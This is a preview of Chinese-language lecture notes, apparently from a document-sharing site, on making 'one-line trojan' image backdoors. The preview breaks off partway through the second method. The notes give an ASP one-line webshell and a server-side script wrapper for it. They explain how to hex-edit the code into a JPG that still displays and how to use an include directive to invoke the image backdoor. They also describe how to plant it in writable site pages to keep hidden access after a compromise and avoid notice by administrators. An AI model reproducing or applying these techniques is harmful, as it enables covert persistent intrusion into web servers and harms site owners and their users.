一句話木馬圖片制作三種方法重點(diǎn)講義資料_第1頁(yè)
一句話木馬圖片制作三種方法重點(diǎn)講義資料_第2頁(yè)
一句話木馬圖片制作三種方法重點(diǎn)講義資料_第3頁(yè)
全文預(yù)覽已結(jié)束

下載本文檔

版權(quán)說(shuō)明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請(qǐng)進(jìn)行舉報(bào)或認(rèn)領(lǐng)

文檔簡(jiǎn)介

Copy命令制作asp內(nèi)容:打開(kāi)cmd,數(shù)據(jù)一下命令:此時(shí)打開(kāi)兩個(gè)jpg文件,相比:且打開(kāi)2.jpg可以像1.jpg一樣顯示圖像。把以下代碼放入目標(biāo)網(wǎng)站,即可按asp執(zhí)行。<%#includefiles=””%>Uedit32(轉(zhuǎn)載):本制作來(lái)自于:雪糕。我們通常在得到webshell之后都想給自己留個(gè)后門(mén),等下次或以后有用得到的時(shí)候再進(jìn)來(lái)看看。但如果直接加入一句話木馬<%executerequest("value")%>到asp文件中時(shí),在該頁(yè)面上就會(huì)有類(lèi)似如下的錯(cuò)誤:MicrosoftVBScript運(yùn)行時(shí)錯(cuò)誤錯(cuò)誤'800a000d'類(lèi)型不匹配:'execute'/news1/show.asp,行3所以我們就可以開(kāi)動(dòng)腦筋了,使用插入一句話木馬的圖片做我們的后門(mén)。而且我們?nèi)绻凶銐虻臋?quán)限的話(希望網(wǎng)站中的文件可寫(xiě)),就直接把網(wǎng)站原有的圖片變成后門(mén),然后在那個(gè)asp文件中加入調(diào)用圖片后門(mén)的代碼:<!--#includefile="圖片后門(mén)地址"-->這樣就沒(méi)有上面的“類(lèi)型不匹配:'execute'”錯(cuò)誤了,而且也更好的隱藏了我們的后門(mén)。新挑戰(zhàn)始終會(huì)伴著新事物的出現(xiàn)而出現(xiàn),當(dāng)我們直接將我們的一句話木馬的asp文件改成jpg或gif文件的時(shí)候,這個(gè)圖片文件是打不開(kāi)的,這又容易被管理員發(fā)現(xiàn)。然后我們就又開(kāi)始思考并尋找新的方法:制作可以顯示圖片內(nèi)容的圖片格式后門(mén)。制作步驟:一、前期準(zhǔn)備材料:2.一句話木馬服務(wù)器端代碼:<%executerequest("value")%>(其他的一句話也行)Script標(biāo)簽:<SCRIPTRUNAT=SERVERLANGUAGE=JAVASCRIPT>一句話木馬服務(wù)器端代碼</SCRIPT>4.調(diào)用圖片后門(mén)代碼:<!--#includefile="圖片地址"-->工具:UltraEdit二、開(kāi)始制作:UltraEdit打開(kāi)1.jpg文件,然后按CTRL+F進(jìn)行查找圖片中的“<%”和“%>”其中<%的十六進(jìn)制代碼是3E25,那么%>就應(yīng)該是253E,但是我們只把25改成00;之后我們?cè)谛陆ㄒ粋€(gè)文本編輯窗口,將我們的script標(biāo)簽代碼<SCRIPTRUNAT=SERVERLANGUAGE=JAVASCRIPT><%executerequest("value")%></SCRIPT>復(fù)制進(jìn)去,然后點(diǎn)擊右鍵選擇十六進(jìn)制編輯命令,這樣會(huì)跳轉(zhuǎn)到十六進(jìn)制數(shù)據(jù)窗口,復(fù)制所有的十六進(jìn)制的數(shù)據(jù),粘貼到1.jpg的十六進(jìn)制編輯窗口的最下面,說(shuō)明:為什么要粘貼到最下面?假設(shè)你把srcipt標(biāo)簽的十六進(jìn)制代碼粘貼到中間的話,就會(huì)破壞圖片的完整性,那樣下面的圖片就看不到了,但是插入的一句話代碼還是起作用的。如圖:最后保存退出。完成整個(gè)過(guò)程,我們的圖片后門(mén)就做成??吹搅税?,圖片和原來(lái)還是一樣的,但有時(shí)候會(huì)影響圖片顯示效果。說(shuō)明:為什么要把“<%”和“%>”對(duì)應(yīng)的十六進(jìn)制中的25改成00呢?改成其他的行不行?雪糕猜想:因?yàn)樵谖覀兊囊痪湓捘抉R服務(wù)器代碼<%executerequest("value")%>中含有“<%”和“%>”們,但我們使用一句話客戶端連接時(shí),就可能發(fā)生尋找錯(cuò)誤,然后就找不到我們的一句話服務(wù)器端代碼了,所以要把圖片中的相似結(jié)構(gòu)改成其他的。我想25也應(yīng)該可以改成別的,但還沒(méi)實(shí)驗(yàn)過(guò)。2.我們已經(jīng)做好了圖片后門(mén),然后就是簡(jiǎn)單的配置一下了。如果網(wǎng)站的asp網(wǎng)頁(yè)可以被寫(xiě)入,那我們就將<!--#includefile="1.jpg"-->直接插入到網(wǎng)頁(yè)中,這樣這個(gè)網(wǎng)頁(yè)的url就是成了我們使用一句話客戶端連接的后門(mén)地址了;但要是不走運(yùn),那就自己新建一個(gè)asp文件,把<!--#includefile="1.jpg"-->加進(jìn)去吧(這里我新建了一個(gè)1.asp文件)。Ps插入第二種方法:

1.用PS(photoshop)打開(kāi)圖片

2.文件→文件簡(jiǎn)介

溫馨提示

  • 1. 本站所有資源如無(wú)特殊說(shuō)明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請(qǐng)下載最新的WinRAR軟件解壓。
  • 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請(qǐng)聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
  • 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁(yè)內(nèi)容里面會(huì)有圖紙預(yù)覽,若沒(méi)有圖紙預(yù)覽就沒(méi)有圖紙。
  • 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
  • 5. 人人文庫(kù)網(wǎng)僅提供信息存儲(chǔ)空間,僅對(duì)用戶上傳內(nèi)容的表現(xiàn)方式做保護(hù)處理,對(duì)用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對(duì)任何下載內(nèi)容負(fù)責(zé)。
  • 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請(qǐng)與我們聯(lián)系,我們立即糾正。
  • 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時(shí)也不承擔(dān)用戶因使用這些下載資源對(duì)自己和他人造成任何形式的傷害或損失。

最新文檔

評(píng)論

0/150

提交評(píng)論